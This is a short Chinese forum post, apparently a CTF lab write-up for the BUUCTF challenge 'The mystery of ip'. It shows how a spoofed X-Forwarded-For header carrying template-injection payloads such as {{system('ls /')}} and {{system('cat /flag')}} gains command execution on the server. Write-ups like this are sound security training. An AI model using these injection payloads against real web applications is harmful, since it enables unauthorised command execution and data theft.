登录后更精彩...O(∩_∩)O...
您需要 登录 才可以下载或查看,没有账号?立即注册
×
BUUCTF靶场36 -- [BJDCTF2020]The mystery of ip
hint的源码里面有这句话
flag里面显示的是ip地址,那么就可以猜测是xff注入
bp里试一下
X-Forwarded-for:text 
这种输什么回显什么的可以猜测ssti注入 X-Forwarded-for:{{system('ls')}} 
[PHP] 纯文本查看 复制代码 X-Forwarded-for:{{system('cat /flag.php')}}
看来不是这个
X-Forwarded-for:{{system('ls /')}} 或更高级的: X-Forwarded-For:127.0.0.1{{system('find / -name flag')}}
X-Forwarded-for:{{system('cat /flag')}}
referer: 1. https://blog.csdn.net/missht0/article/details/113142007 2. https://blog.csdn.net/weixin_44622228/article/details/105624394
| 
发表于 2022-9-6 22:59:34
